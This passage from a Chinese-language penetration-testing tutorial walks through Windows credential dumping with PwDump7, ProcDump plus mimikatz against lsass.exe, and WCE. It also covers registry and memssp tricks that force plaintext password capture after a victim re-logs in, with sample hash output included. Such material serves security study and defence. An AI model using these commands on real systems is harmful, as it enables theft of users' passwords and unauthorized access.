4.4 PwDump7
工具下载地址:
https://download.openwall.net/pub/projects/john/contrib/pwdump/pwdump7.zip
image.png
4.4.1 server2003
可以在Windows2003上执行,手工将得到的结果保存在1.txt中:
PwDump7.exe > 1.txt
Administrator:500:F0D412BD764FFE81AAD3B435B51404EE:209C6174DA490CAEB422F3FA5A7AE634::: Guest:501:NO PASSWORD*********************:NO PASSWORD*********************::: SUPPORT_388945a0:1001:NO PASSWORD*********************:E0BD9A807066324A42B519FF5BEFF787::: IUSR_TEST-D19EBC014E:1003:D4A491469B36E4DEDFF5B37B55778470:2471C03E798817564147AAA062FE8E22::: IWAM_TEST-D19EBC014E:1004:CE5EF4E001CFA44F29C8D4F0A6CA5261:15F2DD2C17E53DD2FB0E43A1F6B1DFD6::: ASPNET:1006:6FF5F98464BA40B4762AEFFACC0990D3:E1C2E3693E2A0392D8F625BB47CA78C1::: test:1007:44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
4.4.2 windows10
4.5 Procdump+Mimikatz
ProcDump是一个命令行程序,可以将系统正在运行的进程转存储生成为dump文件,微软自己的工具,理论上来说不应该会被杀。它的原理是Procdump导出lsass.exe的转储文件,使用mimikatz读取器中的hash。
如果对方机器是win10以下的,都可以获取明文密码。
下载地址:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
使用方法:
先dump出lsass.exe:
32位: procdump.exe -accepteula -ma lsass.exe lsass.dmp 64位: procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp
mimikatz读取:
sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full
4.5.1 server2003
无法使用
4.5.2 Windows10
执行命令:
procdump.exe -accepteula -ma lsass.exe lsass.dmp
然后使用mimikatz读取:
sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full
4.6 WCE
官网地址:https://www.ampliasecurity.com/research.html
32位下载:https://www.ampliasecurity.com/research/wce_v1_42beta_x32.zip
64位下载:https://www.ampliasecurity.com/research/wce_v1_42beta_x64.zip
参数解释: -l 列出登录的会话和NTLM凭据(默认值) -s 修改当前登录会话的NTLM凭据 参数:<用户名>:<域名>:<LM哈希>:<NT哈希> -r 不定期的列出登录的会话和NTLM凭据,如果找到新的会话,那么每5秒重新列出一次 -c 用一个特殊的NTML凭据运行一个新的会话 参数:<cmd> -e 不定期的列出登录的会话和NTLM凭据,当产生一个登录事件的时候重新列出一次 -o 保存所有的输出到一个文件 参数:<文件名> -i 指定一个LUID代替使用当前登录会话 参数:<luid> -d 从登录会话中删除NTLM凭据 参数:<luid> -a 使用地址 参数: <地址> -f 强制使用安全模式 -g 生成LM和NT的哈希 参数<密码> -K 缓存kerberos票据到一个文件(unix和windows wce格式) -k 从一个文件中读取kerberos票据并插入到windows缓存中 -w 通过摘要式认证缓存一个明文的密码 -v 详细输出
使用方法:wce.exe -l或者直接wce。
4.6.1 server2003
4.6.2 Windows10
无法使用:
4.6.3 Windows7
正常执行:
5. Windows获取明文密码
在这里主要是获取Windows高版本的明文密码,因为在Windows2012系统及以上的系统,默认在内存缓存中禁止保存明文密码的。攻击者可以通过修改注册表的方式抓取明文,需要用户重新登录后才能成功抓取。
本次环境Windows server2012,本文默认已获取system权限的情况下进行操作。
而且本文不讨论抓取密码工具或方法的免杀方式。
6. 获取明文密码方法
6.1 修改注册表
前提条件:
- •
system权限 - • 需要锁屏后重新登录
在这里依旧使用mimikatz进行密码的抓取,默认情况下是无法获取明文信息的:
privilege::debug 提升权限,返回Privilege '20' OK。说明权限提升成功 sekurlsa::logonpasswords 可以读取到NTLM哈希值
使用命令行将其修改成记录明文密码,在这里需要注意使用管理员权限来执行:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
再使用命令锁屏:(这个命令可以使用用户权限来执行)
rundll32.exe user32.dll,LockWorkStation
接下来等待用户再次登录一次就可以抓到了:
如果说在修改之后抓取到了密码,想要恢复对方的注册表,只需要执行下面的命令即可:(依旧需要使用管理员权限)
修改不记录明文密码 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
再次重启下就可以了:(锁屏无效)
privilege::debug 提升权限,返回Privilege '20' OK。说明权限提升成功 sekurlsa::logonpasswords 可以读取到NTLM哈希值
6.2 mimikatz插ssp记录密码
需要的条件:
- •
system权限 - • 锁屏并重新登入
在这里使用mimikatz来实现:
privilege::debug misc::memssp
修改完之后使用以下命令锁屏:rundll32.exe user32.dll,LockWorkStation
然后在以下目录下发现明文密码:
C:\Windows\System32\mimilsa.log
7. 总结
其实还有很多的其他方法,在这里就不进行一个个演示了,而且在这里并没有对其是否免杀的能力进行测试,对于不同的环境,免杀的方法也不相同,等以后有时间再学习下。
